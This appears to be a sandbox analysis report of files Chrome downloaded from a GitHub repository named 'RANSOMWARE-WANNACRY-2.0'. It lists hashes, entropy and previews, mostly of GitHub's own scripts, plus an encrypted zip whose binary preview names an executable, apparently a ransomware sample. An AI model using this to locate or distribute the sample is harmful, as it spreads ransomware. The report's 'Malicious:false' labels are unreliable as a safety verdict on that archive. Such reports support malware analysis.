                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_paths_index_ts"],{22326:(e,n,t)=>{t.d(n,{$_:()=>i.$_,$g:()=>i.$g,$t:()=>i.$t,A4:()=>i.A4,AT:()=>i.AT,Aq:()=>i.Aq,B7:()=>i.B7,BK:()=>i.BK,By:()=>i.By,C2:()=>i.C2,C9:()=>i.C9,CB:()=>i.CB,Cv:()=>i.Cv,DN:()=>i.DN,DW:()=>i.DW,DX:()=>i.DX,ED:()=>i.ED,ER:()=>i.ER,F8:()=>i.F8,FL:()=>i.FL,Fc:()=>i.Fc,Fe:()=>i.Fe,GX:()=>i.GX,Gr:()=>r.Gr,H7:()=>i.H7,HK:()=>i.HK,HY:()=>i.HY,IU:()=>i.IU,IY:()=>i.IY,J9:()=>i.J9,Jb:()=>i.Jb,Jw:()=>i.Jw,KL:()=>i.KL,Kl:()=>i.Kl,Lv:()=>i.Lv,Mf:()=>r.Mf,N2:()=>i.N2,NS:()=>i.NS,Nj:()=>i.Nj,Ns:()=>i.Ns,OI:()=>i.OI,OO:()=>i.OO,P4:()=>i.P4,PP:()=>i.PP,QD:()=>i.QD,QG:()=>i.QG,QY:()=>i.QY,Q_:()=>i.Q_,Qi:()=>i.Qi,S$:()=>i.S$,SV:()=>i.SV,SY:()=>i.SY,Su:()=>i.Su,U:()=>i.U,UY:()=>i.UY,Uc:()=>i.Uc,V6:()=>i.V6,Vr:()=>i.Vr,WG:()=>i.WG,WO:()=>i.WO,XR:()=>i.XR,Xc:()=>i.Xc,Xo:()=>i.Xo,Yc:()=>i.Yc,Z0:()=>i.Z0,ZD:()=>i.ZD,ZH:()=>i.ZH,ZI:()=>i.ZI,Zs:()=>i.Zs,Zv:()=>i.Zv,_1:()=>i._1,_S:()=>i._S,aP:()=>i.a
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (4749)
                                                                                      Category:dropped
                                                                                      Size (bytes):9497
                                                                                      Entropy (8bit):5.17924075209339
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Fhk3HeTNkCQ26YqdjhHFPcBN0DeN56boD94G+ttPw3xMsJW3r4K4:FCO9Q26YqdjhH699YPEGsW4
                                                                                      MD5:B6B600C9F1DD4C88024D62E6FF2EB871
                                                                                      SHA1:5A22091378AF6A681A1EDD36E5337B9B6F70613C
                                                                                      SHA-256:447A26CBCBCED255F24F46C1E82A6F3A4DE3B2A44D4B0AB7B6F427B12F783F8F
                                                                                      SHA-512:7BD350D761F4F22866B454B1271AF79EF5D23F5D1B8CB0598C34F739E3DAB977450D61D01B8A0C135FFF309389F712C0114E9CD6E844D2261D2536377B71B838
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_oddbird_popover-polyfill_dist_popover_js"],{13604:()=>{var e=class extends Event{oldState;newState;constructor(e,{oldState:t="",newState:o="",...n}={}){super(e,n),this.oldState=String(t||""),this.newState=String(o||"")}},t=new WeakMap;function o(o,n,r){t.set(o,setTimeout(()=>{t.has(o)&&o.dispatchEvent(new e("toggle",{cancelable:!1,oldState:n,newState:r}))},0))}var n=globalThis.ShadowRoot||function(){},r=globalThis.HTMLDialogElement||function(){},i=new WeakMap,l=new WeakMap,a=new WeakMap;function p(e){return a.get(e)||"hidden"}var u=new WeakMap;function s(e,t){return!("auto"!==e.popover&&"manual"!==e.popover||!e.isConnected||t&&"showing"!==p(e)||!t&&"hidden"!==p(e)||e instanceof r&&e.hasAttribute("open"))&&document.fullscreenElement!==e}function c(e){return e?Array.from(l.get(e.ownerDocument)||[]).indexOf(e)+1:0}function f(e){let t=l.get(e);for(let e of t||[]){if(e.isConnected)return e;t.dele
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):38223
                                                                                      Entropy (8bit):4.711996057591407
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:PwipA4EJXG6tvh2/ciV4J7EqrPu4r6VonLIWEDgI:If4EJW5cnDrG4rZL4
                                                                                      MD5:4EBA7BB6D931096934A0DDCF9CC1E3C5
                                                                                      SHA1:688DEBD9559837741D7F4BB8929433DFFBB420DC
                                                                                      SHA-256:2E94AB749073711241DFD42D24C632080C63CC975A6BF07D722379263057B4CB
                                                                                      SHA-512:AC4F076FA54C60CB1C15DD8EE456C0CCD66A099A917E64EAC67E5030D7F9A849852E9B10B0C20020713C6E2FBB3A06138F128CFA461D0F2C74564CEF96112CCD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"files":[{"displayName":"README.md","repoName":"RANSOMWARE-WANNACRY-2.0","refName":"master","path":"README.md","preferredFileType":"readme","tabName":"README","richText":"<article class=\"markdown-body entry-content container-lg\" itemprop=\"text\"><div class=\"markdown-heading\" dir=\"auto\"><h1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\">RANSOMWARE-WANNACRY-2.0</h1><a id=\"user-content-ransomware-wannacry-20\" class=\"anchor\" aria-label=\"Permalink: RANSOMWARE-WANNACRY-2.0\" href=\"#ransomware-wannacry-20\"><svg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"><path d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .01
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (32092)
                                                                                      Category:dropped
                                                                                      Size (bytes):32234
                                                                                      Entropy (8bit):5.150537251071248
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:wburvH6liA34K7Z9sJ+NEG/811UCdaoGqgA3INgMKS1+Sq8WOHr6gbeiG4nTzGN8:wburvHe34KdE+NEG/8gCdaoPpINg5kTF
                                                                                      MD5:F01327C1BCF097A13D17356366E29FC1
                                                                                      SHA1:D10DFDF6D45659D5116E81FDF1C119B3FDBE17C1
                                                                                      SHA-256:8C20C9903ADA8A80F2186E5E1102F44326754C57D89CAA9A9C46DD0A3C15BCF2
                                                                                      SHA-512:D1813BA335D80383F4EB08DE1E7892F8DA0128169595886E891D59FE992D6D0D438FDC640635D8AC89077648A44FE7BA8BBE611848EBB743C811364AB1D915B3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc1","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-b4a243","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js"],{59753:(t,e,n)=>{function i(){if(!(this instanceof i))return new i;this.size=0,this.uid=0,this.selectors=[],this.selectorObjects={},this.indexes=Object.create(this.indexes),this.activeIndexes=[]}n.d(e,{f:()=>L,S:()=>S,on:()=>C});var o,r=window.document.documentElement,s=r.matches||r.webkitMatchesSelector||r.mozMatchesSelector||r.oMatchesSelector||r.msMatchesSelector;i.prototype.matchesSelector=function(t,e){retu
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3481589
                                                                                      Entropy (8bit):7.999940457163727
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:vhvb2BVmAw0p9jIVcEj5nnZNRyA30yBSRT:vhvq7Bu6EZnZN5EyBSN
                                                                                      MD5:EFE76BF09DABA2C594D2BC173D9B5CF0
                                                                                      SHA1:BA5DE52939CB809EAE10FDBB7FAC47095A9599A7
                                                                                      SHA-256:707A9F323556179571BC832E34FA592066B1D5F2CAC4A7426FE163597E3E618A
                                                                                      SHA-512:4A1DF71925CF2EB49C38F07C6A95BEA17752B025F0114C6FD81BC0841C1D1F2965B5DDA1469E454B9E8207C2E0DFD3DF0959E57166620CCFF86EEEB5CF855029
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:PK.........[.J.."@..5...5.D...ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUT....i.Y.j.Yux.............c..|.!9....T....I..^.Z.@.$:...-.h...*.. ..x{&:....a..........D~&....^A.@N.....(.b..U.a.....f.N)./?...e(...34#.......R.......[).T....Zw.@........?..dsTT.u..PM....qy........@.C.....6..........?./#....BB.....Jq..Gp..`C(.i......m.......b1.q..p.....~...1N-....e...F.O..EWFH.@;..q....E.!!.=.dUyM_hl.[mb}...=..?.bx._.Ey..;.F>.S..G....,R.3qS.:."....QD..........C..p..G6rS.[....~m...s.-..i...O....1N..K.A.M._-|. ...7..~.H*.p..s)C....U.EA27 ......7..$._R'%....7.#....UB...sj....F..O.8.x....^n...].4..yO?..*|..Mdq..^...!zj...2.>{%.F.....?S...8..+.4..=X~.C.<.Sz...42..f........O.-.u-%B.....}~....?.i..D.........Oi.sLF.............. ?.}..I........9...I.E.Z..*(....../.....L.A..Q.%:....&.h.>q.gj......U.Fc(..+m.,.U\u0.*.......B.jNy..Z..h..@...9A}[....#............F.,...e.0.%....w.H.e.eV.7.......9.r(..4.......`..83l.Fx...]X...ll.d........K.l\.E
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (32097)
                                                                                      Category:dropped
                                                                                      Size (bytes):32239
                                                                                      Entropy (8bit):5.39727940647139
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:BmxOb2qjxMsgb04LiIwKpYjr8pVpbnKqnT0qyzgdG9+TypTL6sb03P3lKcG:Dii3KpQEpbKVBuTyNL6sb0f3lKcG
                                                                                      MD5:502593A6EB977A150603E73C0C13B0D8
                                                                                      SHA1:55CBC204F5C484C42539FA7EAC8808AB2D248540
                                                                                      SHA-256:BF4692EB2455F13975B8A583EF8C34FD55379DFF8950B4460717520E13B27322
                                                                                      SHA-512:01764C79FA414C93766908622D74087623CBFF4EA6B810CEAF7C41BC767ADD9917A46CC2A451EA2BC66A0C194AECF3BA528AD9BC70D46837321BE53FF2DC19E2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad","vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--ba8cb1","vendors-node_modules_primer_react_lib-esm_Spinner_Spinner_js-node_modules_primer_react_lib-es-5da0b81","vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_github_catalyst_lib_index-255804","vendors-node_modules_primer_react_lib-esm_Octicon_Octicon_js-node_modules_github_catalyst_lib-3bb484"],{48858:(e,t,n)=>{let r;n.d(t,{e:()=>function e(t,n,i){let l;let s=new AbortController,c=null!=i?i:s.signal;t.setAttribute("data-focus-trap","active");let d=document.createElement("span");d.setAttribute("class","sentinel"),d.setAttribute("tabindex","0"),d.setAttribute("aria-hidden","true"),d.onfocus=()=>{let e=(0,o.O)(t,!0);null==e||e.focus()};let u=document.createElement("span");function f(e){if(e instance
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):894
                                                                                      Entropy (8bit):5.352218886341544
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:YK00/17T0/Cy7T0//q+UVMGqNqmMGWQTwLAxw0dAMGTg:YXI17TICy7TI/qn2dqFbQTsAxbdL0g
                                                                                      MD5:D923131E6031C6A67C398C8A6288B521
                                                                                      SHA1:61199FEFE8C3EF140AD99F25D50EFACCB1CA54C2
                                                                                      SHA-256:C7FBC4DAD3E6B0FA653DF5B7F48C07EC55334F49EECB1203E3B93B32F9908B26
                                                                                      SHA-512:99AD1E3864B5A06D5927A5A8A57978B92C8C650B652B7D7CB78926FACE9FBAFC833D7288AB121C5F13588E6EB7D422A92379FF7881A26568F398DE5890E86B15
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"oid":"2445abd45c99c3ad9611ebcacc6cfe28451c2c0d","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d","date":"2017-06-01T15:17:38.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" class=\"Link--secondary\" href=\"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d\">Update README.md</a>","bodyMessageHtml":"","author":{"displayName":"Chronos","login":"chronosmiki","path":"/chronosmiki","avatarUrl":"https://avatars.githubusercontent.com/u/19915931?s=40&v=4"},"authors":[{"login":"chronosmiki","displayName":"Chronos","avatarUrl":"https://avatars.githubusercontent.com/u/19915931?v=4","path":"/chronosmiki"}],"committerAttribution":false,"committer":{"login":"web-flow","displayName":"GitHub","avatarUrl":"https://avatars.githubusercontent.com/u/19864447?v=4","path":"/web-flow"},"status":null,"isSpoofed":false}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (17915)
                                                                                      Category:dropped
                                                                                      Size (bytes):33385
                                                                                      Entropy (8bit):5.531914044609266
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:WdRq8k8KlRrfCMKsLpFzeUtXyCge7DJMQpSfMwm6qHR5khaCe:Wy8k8KlRrfCMKsLpFzVtXyCV7DPpGtmv
                                                                                      MD5:2C1602C58CEE3F6A3D2116BB438A58DC
                                                                                      SHA1:11262B63B26075A41363DFEBBC2F6E13E4EBD195
                                                                                      SHA-256:78F130D83EA02D05C3A755EC98016B491B45B4578C44699DFA4BCEE2C90F026D
                                                                                      SHA-512:F17F2ABFFB7FBB1525C0ABEFDE73C4155FE7494C75294F4C0921616975AE135836E07E240264C192956D2E1505819AFB6408DCAA93A8E7E1CCD66EC624EBC36D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js"],{13275:(e,t,a)=>{a.d(t,{z:()=>r});function r(e,t,{direction:a="vertical",startMargin:r=0,endMargin:n=0,behavior:i="smooth"}={}){let l="vertical"===a?"top":"left",o="vertical"===a?"bottom":"right",s="vertical"===a?"scrollTop":"scrollLeft",{[l]:d,[o]:c}=e.getBoundingClientRect(),{[l]:u,[o]:p}=t.getBoundingClientRect();if(d<u+r){let e=d-u+t[s];t.scrollTo({behavior:i,[l]:e-r})}else if(c>p-n){let e=c-p+t[s];t.scrollTo({behavior:i,[l]:e+n})}}},96721:(e,t,a)=>{a.d(t,{Z:()=>j});var r=a(67294);let n=(0,r.createContext)(null);var i=a(51526),l=a(31171),o=a(70697);function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e}).apply(this,arguments)}let d=r.forwardRef(({as:e=i.Z,onFocus:t,onBlur:a,onChange:d,onKeyDow
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (49752)
                                                                                      Category:dropped
                                                                                      Size (bytes):71844
                                                                                      Entropy (8bit):5.375150072566736
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Fpt1H2jyStzakPSm2sCgpENDqvoaODlvOGD5WPcCPOxvI3jAvfBPQX5ThikO2a/d:6LCnWExvIV4b1
                                                                                      MD5:9C51B8FF8C1AFD3F3649262A9F757CFA
                                                                                      SHA1:0A62F6C09AC72C2E01904EEE217E8831191775AF
                                                                                      SHA-256:677E52EB2286671D0C90F2A0DE3BD32509187D31F58EB4F5BD045CB6275D4E3E
                                                                                      SHA-512:A5CA34673A1239BF70A819AD39BEA8A9B736000C7EA475F2612EA099CA78799B6620AFC2F248224E2A1F50C86B06A59630F445FCEB5A7D6C487A3A92F74DB0E0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_onfocus_ts-app_assets_modules_github_visible_ts-app_components_sear-d461c8","ui_packages_soft-navigate_soft-navigate_ts"],{174:(e,t,i)=>{function r(e){let t=function(e){let t=[...Object.values(e)].reduce((e,t)=>e+t.visitCount,0);return new Map(Object.keys(e).map(i=>[i,e[i].visitCount/t]))}(e),i=function(e){var t,i;let r=(t=[...Object.keys(e)],i=t=>e[t].lastVisitedAt,t.sort((e,t)=>i(e)-i(t))),n=r.length;return new Map(r.map((e,t)=>[e,(t+1)/n]))}(e);return function(e){return .6*(t.get(e)||0)+.4*(i.get(e)||0)}}i.d(t,{vt:()=>d,WF:()=>u,DV:()=>c,jW:()=>f,Nc:()=>s,$t:()=>r});let n=/^\/orgs\/([a-z0-9-]+)\/teams\/([\w-]+)/,o=[/^\/([^/]+)\/([^/]+)\/?$/,/^\/([^/]+)\/([^/]+)\/blob/,/^\/([^/]+)\/([^/]+)\/tree/,/^\/([^/]+)\/([^/]+)\/issues/,/^\/([^/]+)\/([^/]+)\/pulls?/,/^\/([^/]+)\/([^/]+)\/pulse/],a=[["organization",/^\/orgs\/([a-z0-9-]+)\/projects\/([0-9-]+)/],["repository",/^\/([^/]+)\/([^/]+)\/
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (14147)
                                                                                      Category:dropped
                                                                                      Size (bytes):14255
                                                                                      Entropy (8bit):5.392618022478865
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:3fXQ9hopbenMd45P/1/T0h73PMlP9NUT4b/:3fXEopbeMiF/hT0hLMx9NUEb
                                                                                      MD5:19D257AB1E1CA0C4D56B447C2A05F84E
                                                                                      SHA1:99DCC72D9970133EF6C17949DC1CA6663892E552
                                                                                      SHA-256:CE03F357E401F8DEE60D53F539F7D62457D52AC302F02D5333FA455201C841DE
                                                                                      SHA-512:5A4A31C01BCA73BA9763913AC3E8B67FD5551B562C71ABDD2577755B995075FBC628C70CBCFBE169FC91E6A154605A9B312E19326A168BD6D37264A52115C81B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js"],{81313:(e,t,n)=>{let r;n.d(t,{X:()=>X});var a=n(67294),i=n(15388),l=n(42483),o=n(14543),d=n(31171),u=n(11791),s=n(69889),c=n(9996),m=n.n(c),p=n(41632),g=n(54085);let f=new Map,w=new WeakMap,h=0;function v({threshold:e,delay:t,trackVisibility:n,rootMargin:i,root:l,triggerOnce:o,skip:d,initialInView:u,fallbackInView:s,onChange:c}={}){var m;let[p,g]=a.useState(null),v=a.useRef(),[x,y]=a.useState({inView:!!u,entry:void 0});v.current=c,a.useEffect(()=>{let a;if(!d&&p)return a=function(e,t,n={},a=r){if(void 0===window.IntersectionObserver&&void 0!==a){let r=e.getBoundingClientRect();return t(a,{isIntersecting:a,target:e,intersectionRatio:"number"==typeof n.threshold?n.threshold:0,time:0,boundingClientRect:r,intersectionRect:r,rootBounds:r}),()=>{}}let{id:i,observer:l,elements:o}=function(e){let t=Object.keys(e).sort().filter(t=>void 0!==e[t]).map(t=>
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11748)
                                                                                      Category:dropped
                                                                                      Size (bytes):12290
                                                                                      Entropy (8bit):5.308603810636119
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:PDwQpxaqtsrAQ80xWAFwOaSgtf2yZRHkw8:hpxaqtml/WkaSgtf2qREw8
                                                                                      MD5:8568EE8A3F6CA40D50063E6117203449
                                                                                      SHA1:F6BC7546660C0620ECB4A7623422AA5093A6286E
                                                                                      SHA-256:38A6C70A02478F5A269FE219C2188DAA0C154EF09305762D3DC71C90A3EF986A
                                                                                      SHA-512:EE3FC84D7FB0FC03D42D2BC7FE780718E9794EE64B63E91D8C59D5EDC463CB35C63454FE62DDB3083FCE463D9D281855DEB5B59DA883CCEEB96109D07E081FB4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_updatable-content_ts"],{97390:(e,t,n)=>{let r,o,i;n.d(t,{M:()=>s,T:()=>c});var a=n(14840),l=n(80702);function s(e,t=!1,n=!1){var s;return!n&&c(e)||function(e,t){let n=r instanceof Element?r:e&&e.ownerDocument&&e.ownerDocument.activeElement?e.ownerDocument.activeElement:null;if(null===n||t&&n===e)return!1;let o=n===e&&(0,l.sw)(n);if(o)return!0;let s=e.contains(n)&&!function(e){if(e instanceof a.Z)return!0;let t=e instanceof HTMLAnchorElement||e instanceof HTMLButtonElement,n=e.parentElement?.classList.contains("task-list-item");if(t&&n)return!0;if(!(i instanceof Element))return!1;let r=e.closest(u);if(!r)return!1;let o=i.closest(u);return r===o}(n);if(s)return!0;let c=i instanceof Element&&e.contains(i)&&!!i.closest("details[open] > summary");return c}(e,t)||(s=e).matches(":active:enabled")||s.contains(o)||!!(e.closest(".is-dirty")||e.querySelector(".is-dirty"))}function c(e){for(let t o
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):898
                                                                                      Entropy (8bit):5.342222862391517
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:YKShjd2OoJjd2OKyJjd2OvHUVMGqNqmMGWQTwLAxw0dAMGTg:Yxh2OoJh2OKyJh2Ov02dqFbQTsAxbdLz
                                                                                      MD5:A1BEF4AA3FB5ECB64FEFBAFCBBC003AF
                                                                                      SHA1:57167BAF130AA3D4C68DC1A90E034637654ECE8D
                                                                                      SHA-256:97C18CC82E71EFDD5CF716E73AB1E4B40436E03ACCAA9212CC4530B3130C1EA0
                                                                                      SHA-512:196FDB635CAC3EBBE5AB2C8DB03A768D3AA9582212DB47E6BF0F087764FAD7ED16598A54DCCE6F4CB1A46D57587683E190A80E33C7384CC0F28C364A36ECAB63
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"oid":"19bd86f8998fd0a34d051cad3894ca19155fcdbe","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/19bd86f8998fd0a34d051cad3894ca19155fcdbe","date":"2017-06-01T14:19:45.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" class=\"Link--secondary\" href=\"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/19bd86f8998fd0a34d051cad3894ca19155fcdbe\">Add files via upload</a>","bodyMessageHtml":"","author":{"displayName":"Chronos","login":"chronosmiki","path":"/chronosmiki","avatarUrl":"https://avatars.githubusercontent.com/u/19915931?s=40&v=4"},"authors":[{"login":"chronosmiki","displayName":"Chronos","avatarUrl":"https://avatars.githubusercontent.com/u/19915931?v=4","path":"/chronosmiki"}],"committerAttribution":false,"committer":{"login":"web-flow","displayName":"GitHub","avatarUrl":"https://avatars.githubusercontent.com/u/19864447?v=4","path":"/web-flow"},"status":null,"isSpoofed":false}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (1616)
                                                                                      Category:dropped
                                                                                      Size (bytes):243826
                                                                                      Entropy (8bit):5.457527691073026
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:ZDuqJUfW5VSgE29xxspm0n1vuz3L9bvZJT3CqbMrhryfQNRPaCieMjAkvCJv1Vir:OfW5VSgE29xxspm0n1vuz3L9bvZJT3CG
                                                                                      MD5:224438FBDE2002DCB2FCEE13859923D6
                                                                                      SHA1:08B02F32BEA6F08251A3C0F51B62EB94EA803677
                                                                                      SHA-256:CCCD3E5BDDAA3221953288A55454E8B5C5BCDA8B78CDB9AD269A0466A475B75D
                                                                                      SHA-512:9BF24150A3F8153B6765922355E43077CA70344FDCB9E9945B8102EBAA4F1B0BDF08DF7D9F524A5CF86A37985C99E2CC04FAA353F862178CE1CF9058DD4577AA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.......<!DOCTYPE html>.<html. lang="en". . data-color-mode="auto" data-light-theme="light" data-dark-theme="dark". data-a11y-animated-images="system" data-a11y-link-underlines="true". >..... <head>. <meta charset="utf-8">. <link rel="dns-prefetch" href="https://github.githubassets.com">. <link rel="dns-prefetch" href="https://avatars.githubusercontent.com">. <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">. <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">. <link rel="preconnect" href="https://github.githubassets.com" crossorigin>. <link rel="preconnect" href="https://avatars.githubusercontent.com">.. .. <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-0eace2597ca3.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a167e256da9c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" med
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (22585)
                                                                                      Category:dropped
                                                                                      Size (bytes):22727
                                                                                      Entropy (8bit):5.3149613980024375
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:gtdlymWdEqmgAmYvnMx2yr3acyHvBJ+bnKq8xfIsgFMqdOSuOt928/N0MtcWfTH6:gPhvA3apsbnKq8xqFMq/kWfL6
                                                                                      MD5:6BF771C08D48648A4D0F782155EF90CD
                                                                                      SHA1:D3263EEF2FC4E3B4E78B649B3408BAF5D9E9B4A3
                                                                                      SHA-256:A7E155E298138C94A5D6DCCABC09F5449900F6467552185E8B1A103A15FBB05D
                                                                                      SHA-512:075CDBE1C5E33D31D8BF2A0EEEAE582316421A93303A84B20130361767110920C2D71C2CA3394625D6BF69A29C763BACB97E49421F16468825616B6E123798BB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0","vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_catalyst_lib_index_-eccae9","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc1","vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537340","vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341","vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537342","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-b4a243","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js","
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (8476)
                                                                                      Category:dropped
                                                                                      Size (bytes):8578
                                                                                      Entropy (8bit):5.357189168054204
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Fn+9AAYNcEqjWLAoH3tUYeGmoOwaOiMvm9okiB6kTvvByQyyvYS1/bCCR/Nc2qvO:soNcJO1eNOvvm9oXRyXy9/NhOYQrl4
                                                                                      MD5:6822816845D932C1E93F68372F005918
                                                                                      SHA1:1DD14A539530E8D131CE29BE5E5F84E4098B6A15
                                                                                      SHA-256:14D338ED3345CC8D74E239C812AA37EEEE6126BC1AD8A17E4E2CF6BA8EE0ADEE
                                                                                      SHA-512:086F7A27BAC0D285F5E0C849CEBAC7176F86EDB18037D8EC4356C2B8892FD3F47E045F857EB673B213661EEA17441192CDB7A76C807C2BADCECFF6B7901ABA92
                                                                                      Malicious:false
                                                                                      Reputation:low
